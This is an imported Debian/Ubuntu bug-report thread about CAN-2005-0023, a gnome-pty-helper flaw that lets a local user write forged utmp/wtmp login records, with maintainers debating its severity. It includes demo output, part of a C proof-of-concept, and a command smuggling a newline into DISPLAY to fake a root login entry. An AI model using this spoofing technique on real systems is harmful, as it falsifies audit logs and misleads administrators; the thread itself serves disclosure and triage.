[CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Automatically imported from Debian bug report #330907 http://bugs.debian.org/330907

Message-Id: <email address hidden>
Date: Tue, 20 Sep 2005 09:01:20 +1000
From: Paul Szabo <email address hidden>
To: Debian Bug Tracking System <email address hidden>
Subject: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole

gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.

Demo output, code below.

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

OUTPUT:

psz@savona:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz pts/2 Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz pts/2 Sep 20 08:40 (xyz)
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
psz 31358 0.0 0.3 10340 7768 ? S 08:14 0:00 xterm -T psz@savona -n psz@savona -sb -sl 10000 -ls
psz 31444 0.0 0.0 1484 380 pts/1 S 08:21 0:00 gnome-pty-helper-exploit xyz
psz 31446 0.0 0.0 1696 604 pts/1 S 08:21 0:00 gnome-pty-helper
psz 31454 0.0 0.0 2496 848 pts/1 R+ 08:21 0:00 ps aux
[1]+ Done gnome-pty-helper-exploit xyz
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)

CODE:

/*
    Must be compiled against (within)
 gnome-libs-1.4.2/zvt
    because it uses *.h files from there.
    Code "stolen" from subshell.c .
*/

#include <sys/types.h>

#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG 4

/* Pid of the helper SUID process */
static pid_t helper_pid;

/* The socketpair used for the protocol */
int helper_socket_protocol [2];

/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];

#include <sys/socket.h>
#include <sys/uio.h>

static struct cmsghdr *cmptr;
#define CONTROLLEN sizeof (struct cmsghdr) + sizeof (int)

static int
receive_fd (int helper_fd)
{
 struct iovec iov [1];
 struct msghdr msg;
 char buf [32];

 iov [0].iov_base = buf;
 iov [0].iov_len = sizeof (buf);
 msg.msg_iov = iov;
 msg.msg_iovlen = 1;
 msg.msg_name = NULL;
 msg.msg_namelen = 0;

 if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
  return -1;
 msg.msg_control = (caddr_t) cmptr;
 msg.msg_controllen = CONTROLLEN;

 if (recvmsg (helper_fd, &msg, 0) <= 0)
  return -1;

 return *(int *) CMSG_DATA (cmptr);
}

static int
s_pipe (int fd [2])
{
 return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}

static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
 GnomePtyOps op;
 int result, n;
 void *tag;

 if (helper_pid == -1)
  return NULL;

 if (helper_pid == 0){
  if (s_pipe (help...

Message-ID: <email address hidden>
Date: Mon, 19 Sep 2005 17:44:05 -0700
From: Steve Langasek <email address hidden>
To: Paul Szabo <email address hidden>, <email address hidden>
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

--YD3LsXFS42OYHhNZ
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote:
> Package: libzvt2
> Version: 1.4.2-19
> Severity: critical
> File: /usr/sbin/gnome-pty-helper
> Justification: root security hole

> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

Why is this filed at severity: critical? What is the attack vector here
which permits root privilege escalation?

--=20
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
<email address hidden> http://www.debian.org/

--YD3LsXFS42OYHhNZ
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDL1tVKN6ufymYLloRAiw2AJ9swavyhKadUyYJcstyPanb5WARhgCggNbM
txoJnEmyWdQGzAiHNOD7PX8=
=+Y4N
-----END PGP SIGNATURE-----

--YD3LsXFS42OYHhNZ--

Message-Id: <email address hidden>
Date: Tue, 20 Sep 2005 11:05:10 +1000
From: Paul Szabo <email address hidden>
To: <email address hidden>, <email address hidden>
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Steve,

>> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
>> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
>> existing records.
>
> Why is this filed at severity: critical? What is the attack vector here
> which permits root privilege escalation?

I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)

(In fact cannot think of any attacks: cannot think of any "important" uses
of utmp/wtmp files. I use utmp in some of my own scripts, that is how I
looked at gnome-tty-helper.)

Cheers, Paul

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

Message-ID: <email address hidden>
Date: Mon, 19 Sep 2005 21:17:10 -0700
From: Steve Langasek <email address hidden>
To: Paul Szabo <email address hidden>
Cc: <email address hidden>
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

--ZPt4rx8FFjLCG7dd
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote:

> >> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> >> DISPLAY (host) settings. I am not sure if it can be tricked into erasi=
ng
> >> existing records.

> > Why is this filed at severity: critical? What is the attack vector here
> > which permits root privilege escalation?

> I do not know any root escalation methods. When using reportbug, those
> options seemed to fit best, apologies if they were not; please change if
> appropriate. (For future reference: which options should I have used
> instead?)

Hmm... After rereading the definition at
<http://www.debian.org/Bugs/Developer#severities>, I guess there's no reason
for this bug to not fall under the description of 'critical', since the
security hole is present just from the installation of the package.

Cheers,
--=20
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
<email address hidden> http://www.debian.org/

--ZPt4rx8FFjLCG7dd
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDL41GKN6ufymYLloRAkMkAJ9fiz9tp71jQy75hq3MZIvZ4m3soQCeOpBA
y/pXKyUx/P/kXtRPo+6R4C8=
=+Uvm
-----END PGP SIGNATURE-----

--ZPt4rx8FFjLCG7dd--

Message-ID: <email address hidden>
Date: Mon, 26 Sep 2005 10:37:48 +0200
From: =?iso-8859-1?Q?Lo=EFc?= Minier <email address hidden>
To: Paul Szabo <email address hidden>, <email address hidden>
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

        Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasin=
g
> existing records.

 Thanks for your report.

 Do you have a CVE ID for this security issue?

 Did you check whether libvte4 is affected?

 Do you have a fix?

   Thanks,

--=20
Lo=EFc Minier <email address hidden>

Message-Id: <email address hidden>
Date: Mon, 26 Sep 2005 22:12:45 +1000
From: Paul Szabo <email address hidden>
To: <email address hidden>, <email address hidden>
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Dear Loic,

> Do you have a CVE ID for this security issue?

No. Sorry, I do not know how to get one. (Nor am sure if this is serious
enough to deserve one.)

> Did you check whether libvte4 is affected?

No. Do not know what libvte4 is.

> Do you have a fix?

No. (Fanciful idea: try running xhost, if it fails then surely you do not
"own" that display. Slow, maybe secure. That is what I use now.)

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

Message-ID: <email address hidden>
Date: Mon, 26 Sep 2005 14:18:19 +0200
From: =?iso-8859-1?Q?Lo=EFc?= Minier <email address hidden>
To: Paul Szabo <email address hidden>
Cc: <email address hidden>
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

On Mon, Sep 26, 2005, Paul Szabo wrote:
> No. Sorry, I do not know how to get one. (Nor am sure if this is seriou=
s
> enough to deserve one.)

 Then I'll see whether it deserves one, and attempt to request one.

> > Did you check whether libvte4 is affected?
> No. Do not know what libvte4 is.

 libvte4 is the GNOME 2 zquivalent of libzvt2, you can grab it from:
    <http://packages.debian.org/>
 the source package for this library is "vte".

 I'd be nice if you could check whether the gnome-pty-helper shipped in
 libvte4 is affected too. Let me know if you don't have a setup
 permitting the check, or if you lack the time.

   Bye,

--=20
Lo=EFc Minier <email address hidden>

Message-Id: <email address hidden>
Date: Mon, 26 Sep 2005 22:43:32 +1000
From: Paul Szabo <email address hidden>
To: <email address hidden>
Cc: <email address hidden>
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

Dear Loic,

>> > Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 zquivalent of libzvt2 ...
> I'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too. Let me know if you don't have a setup
> permitting the check, or if you lack the time.

Looking at the source

  vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c

in line 682 it grabs
 display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

Message-ID: <email address hidden>
Date: Mon, 26 Sep 2005 13:21:11 -0700
From: Matt Zimmerman <email address hidden>
To: <email address hidden>
Subject: CVE name

retitle 329156 [CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
thanks

Use CAN-2005-0023 for this issue.

--
 - mdz

Message-ID: <email address hidden>
Date: Thu, 29 Sep 2005 21:09:11 -0700
From: Thomas Bushnell BSG <email address hidden>
To: <email address hidden>
Subject: help needed

tags 329156 +help
thanks

Message-ID: <email address hidden>
Date: Fri, 30 Sep 2005 13:29:55 +0200
From: Moritz Muehlenhoff <email address hidden>
To: <email address hidden>
Subject: foo

tag 329156 security
thanks
--
Moritz Muehlenhoff <email address hidden> fon: +49 421 22 232- 0
Development Linux for Your Business fax: +49 421 22 232-99
Univention GmbH http://www.univention.de/ mobil: +49 175 22 999 23

Message-ID: <email address hidden>
Date: Fri, 30 Sep 2005 13:57:58 +0200
From: =?iso-8859-1?Q?Lo=EFc?= Minier <email address hidden>
To: Paul Szabo <email address hidden>, <email address hidden>,
 <email address hidden>
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

tags 329156 + upstream security
forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=3D317312
clone 329156 -1
reassign -1 libvte4
thanks

[ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ]

        Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasin=
g
> existing records.

 This vulnerability is identified as CAN-2005-0023. The upstream
 developers of vte have been notified of the bug at:
    <http://bugzilla.gnome.org/show_bug.cgi?id=3D317312>

     Bye,
--=20
Lo=EFc Minier <email address hidden>

Message-ID: <email address hidden>
Date: Sat, 8 Oct 2005 20:35:21 +0200
From: =?iso-8859-1?Q?Lo=EFc?= Minier <email address hidden>
To: <email address hidden>, <email address hidden>
Subject: Re: gnome-pty-helper foo

# downgrading the clone too
severity 330907 normal
thanks

On ven, oct 07, 2005, Martin Schulze wrote:
> severity 329156 normal
> thanks dude
>=20
> Lo=EFc Minier wrote:
> > Hi,
> >=20
> > On Fri, Oct 07, 2005, Martin Schulze wrote:
> > > Could somebody explain the security implication for me?
> >=20
> > You can record in the utmp/wtmp logs something which is wrong, for
> > example that an user is currently connected to a display while he
> > isn't. I'm not the one to argue with though.
>=20
> Ok, so unless somebody proves us wrong we don't consider this a
> security problem.
>=20
> Regards,
>=20
> Joey
>=20
> --=20
> Everybody talks about it, but nobody does anything about it! -- Mark T=
wain
>=20
> Please always Cc to me when replying to me on the lists.
>=20

--=20
Lo=EFc Minier <email address hidden>

Message-Id: <email address hidden>
Date: Wed, 12 Oct 2005 12:21:18 +1000
From: Paul Szabo <email address hidden>
To: <email address hidden>, <email address hidden>
Subject: Re: gnome-pty-helper foo

I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wmtp maintainers.

In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; an expect that

psz@savona:~$ exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz pts/2 Oct 12 12:16 (XX)
root tty01 Jan 01 02:03 (insecure.com)
psz pts/1 Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+ Done exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')"
psz@savona:~$

should suitably freak them out.

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

downgrading, as per Debian discussion

add upstream bug to URL line

Thank you for posting this bug.

Does this occur in Lucid?

Marking this 5.5 year old bug as "Won't Fix" for the Ubuntu task. If upstream or Debian has a fix, please reopen.